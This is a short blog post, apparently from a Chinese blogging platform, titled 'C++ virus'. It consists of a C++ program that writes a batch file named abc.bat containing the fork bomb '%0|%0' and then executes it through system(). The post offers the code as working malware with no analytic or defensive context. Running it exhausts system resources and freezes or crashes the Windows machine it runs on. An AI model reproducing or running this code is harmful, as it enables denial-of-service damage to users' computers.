c++病毒


#include <Windows.h>

#include <iostream>

#include <fstream>

using namespace std;

int main()

{

        char a[9] = "abc.bat";

        ofstream file_out(a);

        file_out<<"%0|%0";

        file_out.close();

        system( a );

        return 0;


}

  

posted @ 2023-12-02 16:59  最后一个还有我  阅读(56)  评论(0)    收藏  举报